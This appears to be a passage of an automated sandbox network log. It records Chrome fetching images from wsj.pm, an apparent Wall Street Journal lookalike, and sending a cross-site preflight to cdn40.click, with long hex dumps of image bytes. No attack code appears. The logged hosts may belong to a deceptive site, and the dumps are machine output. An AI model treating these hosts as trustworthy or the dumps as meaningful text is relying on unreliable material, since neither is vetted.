                                                                                                                2024-04-25 14:58:20 UTC7940INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 dc 00 dc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 06 04 05 07 08 03 02 01 ff c4 00 3e 10 00 02 02 02 01 03 03 03 03 03 02 04 04 04 07 00 01 02 03 04 05 11 12 00 06 21 13 22 31 07 14 41 23 32 51 15 42 61 08 81 24 33 52 71 16 62 91 a1 17 43 53 b1 25 72 82 83 92 c1 e1 ff c4
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((">!"1A#2QBa$3RqbCS%r
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 4c 80 81 e7 e7 60 0e 97 71 2d 1d 1c 86 55 b1 b2 4b 26 2f 19 72 bd 46 9e 1d 98 67 96 08 e6 9d ca b8 0f 20 d3 a0 09 e3 89 8d 47 26 1a d8 ae c5 4f 99 ed db 36 73 d8 cc 83 54 c9 54 84 c5 2a bd 77 78 24 8a 0a d1 b9 89 d7 87 13 c9 d9 47 c8 2a 74 7f cf 41 ab fd 25 71 95 fa 6f 8d ad 95 ac a9 67 15 61 f1 99 18 2d 42 a4 c4 50 7b 4b 07 21 63 1e 99 2a f2 30 66 e2 34 bf 8e b7 09 b1 f0 86 8a ed 78 fe df d4 89 95 c0 dc 6c 0b 2f b7 63 e4 90 49 01 49 00 72 27 e7 5d 72 b7 69 7d 50 c9 56 fa 9f 62 d7 74 d2 4a 34 b2 11 c5 4f 27 24 4b 26 a0 90 1f d1 99 c4 80 90 50 b7 0d b6 cf 12 7e 74 3a ea 3e de b3 1b 19 b1 96 62 84 bc 0c 65 8c 7f f5 00 60 43 2f 22 59 f8 9d 03 21 d7 26 1b fc f4 08 59 6e f3 8b b6 67 fb 7c b6 13 23 34 3c 98 2d aa 01 6c 57 d0 e2 3e 03 2b f1 d7 10 54 a9 00 7b 77
                                                                                                                Data Ascii: L`q-UK&/rFg G&O6sTT*wx$G*tA%qoga-BP{K!c*0f4xl/cIIr']ri}PVbtJ4O'$K&P~t:>be`C/"Y!&Yng|#4<-lW>+T{w
                                                                                                                2024-04-25 14:58:20 UTC3338INData Raw: 75 e2 92 5c 8e 92 64 8f 27 09 2d 62 bc 3a e4 39 49 fc 82 49 f9 d0 1e 49 e8 2a bb 82 3b 78 76 c9 44 c9 25 35 43 69 78 32 cb 5e 20 f1 a5 34 56 22 33 2c 2c 43 0d eb 40 6f e4 f9 51 d4 3e fa ee 3c bb 50 ca e6 45 90 d1 ff 00 56 b5 8d fe a3 08 12 1a b0 f1 1e 52 45 55 fd 49 41 64 e7 c4 32 a2 85 1a e7 e6 e2 45 4b 99 6b 90 62 26 a3 24 96 2d c9 18 87 1d 65 e8 ca 03 e4 20 40 3e de 4e 49 b2 13 61 4f 80 3c 9d eb af 8c 55 b9 b1 f7 55 ae a6 55 86 4d 9a c5 81 14 55 eb c9 24 ad 71 d2 22 cf 23 7a 52 87 25 79 90 14 0f 4d 0e b4 3a 0b 0f a0 dd fb 6b b7 33 43 b5 b3 10 84 ed 9b f6 0c 74 49 94 39 a5 2b 9f 11 93 bd fa 6c db 03 7e 41 23 fe ae ba 66 a8 4a f2 0a ae f0 9d 00 52 30 4e d4 79 0b e0 93 a1 a5 f9 fc 90 7a e5 ac d6 27 01 9e af 1c 18 7b d6 b1 b6 6d c6 ad 1d 5c aa 9a e9 3b b7
                                                                                                                Data Ascii: u\d'-b:9III*;xvD%5Cix2^ 4V"3,,C@oQ><PEVREUIAd2EKkb&$-e @>NIaO<UUUMU$q"#zR%yM:k3CtI9+l~A#fJR0Nyz'{m\;


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                25192.168.2.1749745103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC567OUTGET /img/AM.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:03 GMT
                                                                                                                ETag: "c5a8-61648fe7809c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 50600
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                2024-04-25 14:58:20 UTC7941INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 dc 00 00 00 dc 08 06 00 00 00 1b 5a cf 81 00 00 09 99 69 43 43 50 69 63 63 00 00 58 85 ed 99 57 50 94 c9 1a 86 bf ff 9f 3c cc 10 66 86 9c 86 9c 24 4a 18 40 72 4e 92 a3 a8 c0 cc 90 41 18 72 30 21 8b 2b b0 82 88 48 52 04 11 05 5c 70 75 09 b2 8a 8a 28 06 44 41 01 f3 82 2c 02 ca ba b8 8a a8 a8 6c a1 17 7b aa ce a9 73 b5 75 6e ce 7c 17 dd 4f bd dd 55 5f 77 55 5f bc f5 36 80 34 39 9e 9d 90 82 ea 01 24 24 a6 f2 7c 9c 6c 99 41 c1 21 4c c2 3d 20 02 15 28 40 03 7c 38 3b 25 c9 c3 d7 d1 0f 00 60 75 2f fc 5b bd 1b 03 64 75 be ab fd 9f d7 ff 6b 51 38 09 89 1c 00 84 01 00 b1 1c 6e 0a 1b 00 d9 01 00 d1 9c 04 ce aa 3e bb ca 19 a9 49 a9 00 a8 17 00 30 78 41 c1 21 00 28 67 95 23 be 71 e6 2a 47 7d e3 e2 af 7b fc 7c ec
                                                                                                                Data Ascii: PNGIHDRZiCCPiccXWP<f$J@rNAr0!+HR\pu(DA,l{sun|OU_wU_649$$|lA!L= (@|8;%`u/[dukQ8n>I0xA!(g#q*G}{|
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 86 07 4e fa fd ac 65 cd 8c 3e eb 59 cf da 9d e4 dd 2c 9b 29 1f 89 0d 5e ad f5 83 fe 27 67 d7 f0 6e 16 87 f3 c4 fa 00 19 5d 37 44 c0 63 a1 a0 0a 7d 91 6b 58 41 44 76 11 1b 63 0c bc 6c 2c 4b 76 1d e0 1b 6b 33 cc 24 d9 e7 77 cc 44 5f 5a 26 e6 3b 5d 52 5a f8 ca c0 e9 28 67 43 07 65 e5 01 0f 8f 29 2f d1 98 e2 b9 63 38 9e 46 06 50 16 91 47 69 4d 91 17 6f a6 11 12 24 e8 a3 df 4c 06 e5 7e 19 9d ef 52 fc 06 a5 d1 50 54 a6 86 78 e1 c5 65 96 78 cf 8c 44 21 3c 9e 55 90 8a 2e cc 6c 97 ff 78 b5 63 6b b4 f0 6b 41 6d 1d 7c 25 28 e5 b1 38 a8 8c 5e c7 40 fb 99 48 80 ea 12 18 d1 e5 79 6e e7 ed ad 32 b8 d4 0c fd 93 ea aa e8 2f 68 7d 2c 53 3b db 84 b5 50 94 32 87 d3 43 4a c1 37 c3 a7 df b4 65 0e 0d 4c 1a df 31 0f 7c e0 03 37 6f b0 d7 1e 9f 4d 7e 88 02 ae 83 e2 e8 62 33 94 66
                                                                                                                Data Ascii: Ne>Y,)^'gn]7Dc}kXADvcl,Kvk3$wD_Z&;]RZ(gCe)/c8FPGiMo$L~RPTxexD!<U.lxckkAm|%(8^@Hyn2/h},S;P2CJ7eL1|7oM~b3f
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 2f 09 9d a7 15 73 39 0f 18 4c 03 03 20 3a 9c 02 08 b6 d5 07 82 f2 8a fe 67 1c 7e e7 6d b5 85 d1 b8 0f 30 51 07 46 17 ca 79 19 f8 c4 02 d0 46 88 4a 66 d3 b3 fa 2e 26 6c 6f 97 a6 c7 89 e7 14 5e d4 90 07 63 21 db 39 af f2 58 bc 36 bf cf a9 55 0a 8a 47 e1 5c 53 69 c6 0d 8f 59 32 05 c2 33 10 f1 31 84 06 80 00 65 3e 10 93 1c f5 03 70 98 f2 5b 8d 8d 17 e2 a1 f2 54 da 7b 97 bb dc 65 93 29 1d e0 31 18 11 45 d5 d7 3c 2e 4a ad bf 01 38 6f 02 bc 1c 47 d6 e5 06 c8 4b 18 41 c9 e9 8e 38 ad ad 0f 80 26 d0 50 37 b1 a8 74 3f af d6 7a 3a de 8f 4e 35 0b 08 3d 07 42 8d 5f 32 a0 e4 93 31 71 2e ae a9 1e 1c 84 7a 96 13 a0 13 ea cc 2b d2 71 fd c9 5b 7a 57 97 bd f9 a6 e7 32 b8 78 3c ba c1 e0 da 7f 42 43 4b 8c b4 4f 9f 8e 43 19 29 32 74 a3 c8 bc 0a 2f d7 16 0d dc 33 c5 a5 dc 0c d1
                                                                                                                Data Ascii: /s9L :g~m0QFyFJf.&lo^c!9X6UG\SiY231e>p[T{e)1E<.J8oGKA8&P7t?z:N5=B_21q.z+q[zW2x<BCKOC)2t/3
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 9a 6d 54 ec 37 9d 49 bb 4e cf 7a 1e 2b 57 c4 c3 25 28 82 15 ab ad cf 1d 80 f0 92 29 90 12 4a 36 6f b1 5d 7d fd 06 bd 65 fb 34 04 1a 9a 0d 32 37 79 a5 9c f3 01 89 06 5c 19 07 41 96 6d 3c 09 f1 8e d5 7d 7d 67 c0 4d 2b 53 ba 67 41 ff 1a e0 fb 8e 12 ce cd 69 cc 88 91 68 41 49 a4 97 05 d3 32 5e bc 32 de df b1 bc bb 41 e4 68 4d de dc 75 79 0e d3 a8 a2 ba dd 6f 3e 4f 60 ca 26 70 82 c0 eb 80 3c 99 02 0e 19 cf f6 eb 8c 76 b6 57 a6 98 14 d3 10 0a b8 07 39 d4 56 46 dc a6 47 8a 34 3b 63 02 3a 62 3b 86 87 3a cb 4a f2 7e 90 1e e8 02 18 05 78 b6 0f e6 a5 ca ea fd c8 9c 1c e7 b8 9a 22 e4 98 fb 74 1e 33 46 85 7c 19 0c 60 68 6b 7a fd 93 c7 6f 3e 2a e6 24 ad df 16 f2 e8 b4 a1 1d ba 6a 3c 6e 4e ca 88 5e 1a ae 31 ad b1 f1 d4 93 e8 e4 15 f5 70 79 09 b1 02 23 9a 71 d7 4c cb 13
                                                                                                                Data Ascii: mT7INz+W%()J6o]}e427y\Am<}}gM+SgAihAI2^2AhMuyo>O`&p<vW9VFG4;c:b;:J~x"t3F|`hkzo>*$j<nN^1py#qL
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: 27 bb ae 09 99 1b a3 dc 24 0c 4e a9 e1 09 13 bd 99 4b fa e7 71 8a 8e 41 99 56 45 ea b9 66 a5 a9 7d 5f b7 77 5b 51 ad cf ae 35 11 57 a0 df f6 78 c6 73 f2 0c 3c 8b 8e 93 40 40 af 18 97 73 d7 87 4b 52 c4 3c 6b ef 28 16 6f 8c 46 49 56 c8 72 f2 3a 68 14 85 60 6c 66 7b 98 ad c2 13 f8 8d 41 98 d9 31 a7 7d 01 17 c6 c8 68 19 83 31 3a e0 83 3a ce 75 5e 0a 5a 49 96 19 ae f1 36 e3 6f 4d ce e5 d9 4c 3b a3 e0 3d 68 52 91 28 69 95 b9 3a a3 ba c5 d0 a8 21 b9 f2 62 ea 9c 47 e1 4d da 47 b3 fb 79 77 cd 27 8f d5 1c ed cc 6d 10 5f 76 13 f0 94 15 15 bb 93 b1 73 1a d6 11 f7 f1 c4 7b d4 72 82 b0 75 82 65 5b 01 5c 61 06 3a eb 7e 8d 9f de d8 86 76 93 33 38 85 00 52 4c d3 81 28 13 cf 04 21 75 64 8f 99 62 30 73 61 26 4f 57 36 0a d5 91 29 64 24 56 17 a0 6a cd 58 67 88 33 d5 3d 3d ab
                                                                                                                Data Ascii: '$NKqAVEf}_w[Q5Wxs<@@sKR<k(oFIVr:h`lf{A1}h1::u^ZI6oML;=hR(i:!bGMGyw'm_vs{rue[\a:~v38RL(!udb0sa&OW6)d$VjXg3==
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: a8 c5 13 55 d5 8e a8 38 37 95 39 bf d7 0e c6 c1 41 82 b3 fb 7b 5c 91 01 ae 41 f9 40 1f f7 50 04 8d 70 21 2c aa 21 76 07 68 02 5c 2c c4 3b e9 23 a6 92 12 69 11 20 62 3c 1e 81 b7 e0 31 5d 0f dc 14 63 b9 0f 4f 89 ba d7 b0 81 8c 00 af 41 f0 e4 d0 a2 f2 41 ca b6 15 a4 34 48 18 5e 46 59 d6 9e 0f e7 33 2a 3f 76 47 ae d8 53 68 22 96 90 12 62 70 77 3b c0 c6 d0 f5 54 93 e8 87 e7 01 7d c1 56 46 e6 f7 7f ff f7 5f 8e c3 96 90 69 e0 6c 1b e2 ba 7e d7 f3 37 98 1b 5b bb 05 ce 0c 14 e3 43 e1 36 ae 7e ae ca f6 50 0a 77 b5 45 02 cf 80 00 a8 9d 96 8d e2 f0 84 14 46 8c 82 c5 6a 1b bc 93 5a d7 08 94 e5 2f ab 50 84 9c b0 74 50 21 32 81 42 f0 68 04 c9 a4 f3 8e e7 7e 1f 67 23 38 ae 5d b5 8b 6a 18 56 9f 10 7a 4f 2e cf 35 79 8e f5 74 6d 01 c7 f2 13 36 4a e4 77 82 ed 25 ad 00 8a 51
                                                                                                                Data Ascii: U879A{\A@Pp!,!vh\,;#i b<1]cOAA4H^FY3*?vGSh"bpw;T}VF_il~7[C6~PwEFjZ/PtP!2Bh~g#8]jVzO.5ytm6Jw%Q
                                                                                                                2024-04-25 14:58:20 UTC2659INData Raw: 0a 3e 80 48 31 77 94 84 f2 89 c1 6c b0 7a 26 56 0d 7e 02 d6 00 c1 f2 e1 f9 1a e1 96 a3 62 21 09 48 67 a6 bd e9 60 9e 06 a2 23 af 28 8e a4 f7 bd c5 99 3c 35 4b 9e 97 d9 0a 77 4a e9 3a fa c7 12 53 06 f1 66 82 20 97 c8 0b d6 57 f7 c9 9a 7b 8e d6 7d 11 1e 16 5f f3 8c aa 34 aa 17 74 4f c4 41 0b 59 19 2f de 8b d2 14 e3 20 0f 24 9f 79 ea e2 43 fd ec 1a 0c 8c f9 90 07 ac b4 4a ac 95 e1 53 8c cc 10 e6 c5 36 9f 47 89 7d ce 77 41 e6 92 da fa 4b 01 cc bd be c4 92 7a 3e bf 43 2c 90 44 2b df 7f 76 40 75 fd 84 32 ca af 9e 0a 47 76 3a 2e cc 3d b0 b5 52 36 94 95 01 80 96 78 56 35 ae b1 96 bc f6 1a ec ab e5 5b 0f a1 70 4f 11 22 2c a3 bd 46 3c 34 b6 89 a7 c2 50 e5 21 34 50 c5 40 60 a5 52 bc 4e e2 3c 0b 88 09 a1 49 10 f7 9d 50 cc 04 b4 b0 f1 17 19 bc b3 ff 60 9c 98 32 4f c4
                                                                                                                Data Ascii: >H1wlz&V~b!Hg`#(<5KwJ:Sf W{}_4tOAY/ $yCJS6G}wAKz>C,D+v@u2Gv:.=R6xV5[pO",F<4P!4P@`RN<IP`2O


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                26192.168.2.174974723.133.88.1904436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC551OUTOPTIONS /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                Connection: keep-alive
                                                                                                                Accept: */*
                                                                                                                Access-Control-Request-Method: POST
                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                Origin: https://wsj.pm
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC421INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                allow: OPTIONS, POST
                                                                                                                access-control-allow-origin: https://wsj.pm
                                                                                                                access-control-allow-headers: content-type
                                                                                                                access-control-allow-methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
                                                                                                                vary: Origin
                                                                                                                ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                27192.168.2.1749746103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC574OUTGET /img/im-948629.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:17 GMT
                                                                                                                ETag: "5584-61648ff4da940"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 21892
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png
                                                                                                                2024-04-25 14:58:20 UTC7941INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6e 00 00 00 3e 08 06 00 00 00 ca d5 2e 0c 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c 3c bb e7 93 55 67 96 ee c9 df 30 13 31 73 63 6e cc 4c 57 77 55 a9 54 42 90 fe 64 9e 3c de 7b ef bd 3f e9 bd f7 3e 21 33 21 2d de 64 92 90 78 ef 84 93 40 42 20 64 10 20 40 20 09 49 54 49 2a a9 bc eb ee ea db 37 ee fd 4d 9c a3 99 f9 f0 c6 36 ef d9 fb ec d8 cf bb d6 7a 9e b5 d6 5e d7 ec 73 f1 e3 70 d3 e0 72 52 e3 b4 93 b2 da a8 f3 78 e9 49 44 69 f0 b8 09 eb 8d 24 5d 1e a4 62 19 eb 8b 04 bc f2 7a 29 3f f9 45 01 3f 7f bd 84 9f ae 2f e6 97 05 02 7e fe cb 22 36 16 94 23 10 88 a9 14 c9 d9 50 58 c6 fa 82 32 7e be 41 c0 6b 45 02 4a cb c4 fc fc 75 01 ff bc be 84 57 0b ca f9 a7
                                                                                                                Data Ascii: PNGIHDRn>.pHYs.#.#x?v IDATx<Ug01scnLWwUTBd<{?>!3!-dx@B d @ ITI*7M6z^sprRxIDi$]bz)?E?/~"6#PX2~AkEJuW
                                                                                                                2024-04-25 14:58:20 UTC8000INData Raw: e7 e3 9d 29 17 5e 2a cb b0 88 2b c9 68 e5 f8 d5 22 2c 0a 21 1e 8d 1c ab 5c 88 43 29 c9 ef 9b e5 42 e4 82 22 04 a5 45 a4 42 0e 9a d2 3f 26 2e 4c b9 32 90 5c 83 54 24 43 22 92 b2 6e 69 a0 85 a1 fa 14 97 0f ee e6 a3 b7 de e0 fa e9 13 8c b4 d4 d3 91 8a e6 4b 1d 8d c9 30 43 0d 55 f4 a6 fd f4 57 47 c8 ba 4d 6c ea 6a 60 e7 44 37 8b 3d f5 2c 0f b5 b2 32 d2 c6 da 54 2f 83 75 61 a2 2e 35 6e 43 25 36 6d 25 4d 69 6f 3e f3 ef 32 c9 d1 29 85 28 a5 65 a8 64 25 88 85 05 e8 54 42 f4 9a 4a 54 1a 09 15 c2 12 44 e2 52 44 a2 32 36 6e 7c 0d 41 45 21 42 51 09 5e ab 0a af 45 8b 51 af ca 13 20 ad 5a c6 d3 a7 9f f1 e8 c9 73 3a ea 52 34 c6 bc c4 9c 46 a2 4e 35 9b 9b 23 34 45 1d ec de b9 83 97 bf fa 81 c3 87 0e 23 11 16 51 5e 51 84 de a8 24 1b f6 60 51 8a f0 d8 b4 24 fc 36 da 33 21
                                                                                                                Data Ascii: )^*+h",!\C)B"EB?&.L2\T$C"niK0CUWGMlj`D7=,2T/ua.5nC%6m%Mio>2)(ed%TBJTDRD26n|AE!BQ^EQ Zs:R4FN5#4E#Q^Q$`Q$63!
                                                                                                                2024-04-25 14:58:20 UTC5951INData Raw: 23 a0 d3 a2 af ab a7 a3 b6 06 63 63 7d fc e1 6f ef ed f2 ab 67 4f d9 5e db 20 14 1a 62 73 eb 80 ed 6b 0f 18 19 9c c0 a1 52 e1 37 76 d1 28 91 c6 97 c5 2d 8d 2a aa cb 6a c8 ca c8 23 e1 4c 12 27 4f 9e e7 cd b7 ce f1 da ab 67 28 ca af 40 d3 ac c3 d4 6e 65 71 62 99 d9 d1 79 2e 2d 6f 31 3b bd 80 52 da 4a a5 b0 96 d7 5e 3b 8e 20 af 84 f4 b4 1c de 3c 7a 9e 36 85 81 8b a9 39 58 4c 46 06 3d 5e 44 69 49 54 27 bc 45 47 c6 09 ba 85 a9 b4 17 a5 62 ac c9 25 d8 2a 62 c2 aa 62 ce a9 26 da 51 c7 88 41 c1 56 d0 c2 bb d3 4e f6 c3 6a 74 85 67 10 9e 7d 83 a4 d7 7e 46 79 da 69 ca 32 12 28 cf 4a a6 f0 e2 59 6c 2d 0d 0c 59 f5 8c d8 4c cc f9 1d 2c 06 5d 2c 04 ec 2c 07 3d 5c 19 19 64 6d 20 12 1f 81 31 53 67 fc 08 4b 5a 52 80 ba ae 06 83 ac 0e 79 69 11 ad 45 b9 a8 b2 93 d1 08 33 70
                                                                                                                Data Ascii: #cc}ogO^ bskR7v(-*j#L'Og(@neqby.-o1;RJ^; <z69XLF=^DiIT'EGb%*bb&QAVNjtg}~Fyi2(JYl-YL,],,=\dm 1SgKZRyiE3p


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                28192.168.2.1749748103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC575OUTGET /img/im-949113.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:29 GMT
                                                                                                                ETag: "c91-616490004c440"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 3217
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg
                                                                                                                2024-04-25 14:58:20 UTC3217INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 3e 00 6e 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 02 01 00 ff c4 00 3f 10 00 02 01 02 04 04 04 04 03 05 04 0b 00 00 00 00 01 02 03 04 11 00 05 12 21 06 31 41 51 07 13 22 61 14 71 81 91 32 a1 b1 23 24 42 52 62 08 33 72 f0 15 34 35 43 53 a2 c1 d1 d2 e1 f1 ff
                                                                                                                Data Ascii: C%# , #&')*)-0-(0%()(C(((((((((((((((((((((((((((((((((((((((((((((((((((>n"?!1AQ"aq2#$BRb3r45CS


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                29192.168.2.1749752103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:20 UTC396OUTGET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC254INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Mon, 31 Aug 2020 06:54:20 GMT
                                                                                                                ETag: "1d3e-5ae26df2fdf00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 7486
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
